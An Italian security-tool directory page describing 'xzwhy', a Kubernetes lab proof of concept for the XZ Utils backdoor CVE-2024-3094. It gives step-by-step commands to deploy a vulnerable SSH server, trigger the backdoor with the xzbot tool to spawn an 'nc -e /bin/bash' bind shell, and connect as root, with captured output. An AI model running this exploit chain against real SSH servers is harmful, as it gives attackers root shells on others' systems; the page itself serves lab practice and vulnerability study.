Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
xzwhy — XZ Utils CVE-2024-3094 PoC per Kubernetes | Kitploit
Strumenti/GitHubGitHub/neuralinhibitor/xzwhy
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza CloudApprendimento e FormazioneLab e Pratica
GitHubneuralinhibitor/xzwhy

xzwhy

XZ Utils CVE-2024-3094 PoC per Kubernetes

Vedi Repository
52 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

xzwhy

root@kitploit:~
 _  _  ____  _  _ 
( \/ )(_   )( \/ )
 )  (  / /_  \  / 
(_/\_)(____) (__) 

Questo progetto è una Proof of Concept (POC) compatibile con Kubernetes per CVE-2024-3094, che interessa XZ Utils. Vedi questo articolo per un'ottima analisi dell'origine e del funzionamento dell'exploit.

AVVERTENZA

⚠⚠⚠

L'esecuzione di uno qualsiasi dei comandi seguenti può comportare la distribuzione di un'applicazione vulnerabile, altamente suscettibile ad attacchi. Se scegli di seguire questi passaggi, si consiglia di farlo in un ambiente di test isolato (airgapped).

⚠⚠⚠

Istruzioni

1: Distribuisci l'applicazione vulnerabile

root@kitploit:~
kubectl create -f xzwhy.yml

Questo comando distribuirà un endpoint SSH vulnerabile il cui entrypoint è /bin/bash -c "env -i LANG=en_US.UTF-8 && unset TERM && unset LD_DEBUG && LD_LIBRARY_PATH=/CVE-2024-3094/ /usr/sbin/sshd -p 2222 -D"

2: Ottieni l'URL dell'endpoint vulnerabile

L'endpoint SSH vulnerabile espone due porte tramite un bilanciatore di carico: la 2222 è in ascolto per le connessioni SSH e la 1234 è una comodità per consentire l'ingresso su una porta della bind shell che useremo durante l'exploit.

root@kitploit:~
  type: LoadBalancer
  ports:
    - name: ssh
      protocol: TCP
      port: 2222
      targetPort: 2222
    - name: exploitshellingress
      protocol: TCP
      port: 1234
      targetPort: 1234

Possiamo estrarre l'URL del bilanciatore di carico distribuito usando kubectl:

root@kitploit:~
xzwhy_endpoint=`kubectl get services -o jsonpath='{.items[0].status.loadBalancer.ingress[0].hostname}' --namespace=xzwhy-ns --field-selector metadata.name=xzwhy-loadbalancer` && echo $xzwhy_endpoint

3: Avvia l'attacco effettuando una connessione SSH dannosa

Ora ci connettiamo al server vulnerabile usando l'utility teamnautilus/xzbot:

root@kitploit:~
docker run -it --rm golang:latest /bin/bash -c "mkdir -p /xzbot && pushd /xzbot/ && git clone https://github.com/amlweems/xzbot.git && ls -laF && pushd ./xzbot/ && go build -o /xzbot/tmp/; popd && /xzbot/tmp/xzbot -h && /xzbot/tmp/xzbot -addr $xzwhy_endpoint:2222 -cmd 'nc -lnvp 1234 -e /bin/bash'"

Questo farà sì che il server SSH vulnerabile esegua una bind shell tramite nc -lnvp 1234 -e /bin/bash per nostro conto. Dopo aver eseguito questo comando, dovresti vedere qualcosa di simile a:

root@kitploit:~
Cloning into 'xzbot'...
remote: Enumerating objects: 30, done.
remote: Counting objects: 100% (30/30), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 30 (delta 14), reused 25 (delta 10), pack-reused 0
Receiving objects: 100% (30/30), 422.65 KiB | 8.99 MiB/s, done.
Resolving deltas: 100% (14/14), done.
total 12
drwxr-xr-x 3 root root 4096 Apr 17 22:37 ./
drwxr-xr-x 1 root root 4096 Apr 17 22:37 ../
drwxr-xr-x 4 root root 4096 Apr 17 22:37 xzbot/
/xzbot/xzbot /xzbot /go
go: downloading github.com/cloudflare/circl v1.3.7
go: downloading golang.org/x/crypto v0.21.0
go: downloading golang.org/x/sys v0.18.0
/xzbot /go
Usage of /xzbot/tmp/xzbot:
  -addr string
        ssh server address (default "127.0.0.1:2222")
  -cmd string
        command to run via system() (default "id > /tmp/.xz")
  -seed string
        ed448 seed, must match xz backdoor key (default "0")
00000000  00 00 00 1c 73 73 68 2d  72 73 61 2d 63 65 72 74  |....ssh-rsa-cert|
00000010  2d 76 30 31 40 6f 70 65  6e 73 73 68 2e 63 6f 6d  |[email protected]|
00000020  00 00 00 00 00 00 00 03  01 00 01 00 00 01 01 01  |................|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000130  00 00 00 00 00 00 00 00  00 00 00 01 00 00 00 00  |................|
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000160  00 00 01 14 00 00 00 07  73 73 68 2d 72 73 61 00  |........ssh-rsa.|
00000170  00 00 01 01 00 00 01 00  34 12 00 00 78 56 00 00  |........4...xV..|
00000180  a2 ff d9 f9 ff ff ff ff  a1 36 c4 cc b3 b2 4d b3  |.........6....M.|
00000190  99 11 52 a7 2c 38 d2 29  f9 5d 1a 06 63 36 1e 48  |..R.,8.).]..c6.H|
000001a0  9c 95 4e f1 77 41 07 92  1c a4 9f b0 b4 dc 93 c2  |..N.wA..........|
000001b0  66 03 3d fa 5c 8b 49 41  86 26 42 88 2b 9d 5b 4c  |f.=.\.IA.&B.+.[L|
000001c0  b8 a4 5e 9d 62 c3 51 0a  be ca 5d 8a 47 45 3a 1e  |..^.b.Q...].GE:.|
000001d0  99 1f c1 0e 97 b7 58 ec  51 45 5b 24 3f b4 69 6a  |......X.QE[$?.ij|
000001e0  68 45 7c 3b 3a d9 d7 0a  ad 09 04 d8 a1 b9 81 22  |hE|;:.........."|
000001f0  58 69 eb 07 ad 91 53 15  b2 1d bf 47 b9 48 a0 4e  |Xi....S....G.H.N|
00000200  8b 28 cd 82 4b fd 72 17  12 ce 7f e7 15 3c 9e fa  |.(..K.r......<..|
00000210  a7 e1 d6 e4 ec eb 66 34  5a 74 00 00 00 00 00 00  |......f4Zt......|
00000220  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000230  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000240  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000250  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000260  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000270  00 00 00 00 00 00 00 00  00 00 00 10 00 00 00 07  |................|
00000280  73 73 68 2d 72 73 61 00  00 00 01 00              |ssh-rsa.....|

4: Profitto

Connettiti alla shell che hai generato. Nota l'uso della variabile xzwhy_endpoint:

root@kitploit:~
nc $xzwhy_endpoint 1234

Non è immediatamente evidente, ma il comando precedente si connette a una bind shell come root. Puoi verificarlo eseguendo vari comandi:

root@kitploit:~
whoami
root
root@kitploit:~
hostname -i
10.0.128.62

5: Pulizia

root@kitploit:~
kubectl delete -f xzwhy.yml

Crediti

  • teamnautilus ha creato un server vulnerabile all'exploit
  • amlweems ha pubblicato uno strumento automatizzato per sfruttare endpoint SSH vulnerabili
  • patorjk ha creato un eccellente generatore di testo in arte ASCII
Scarica lo strumento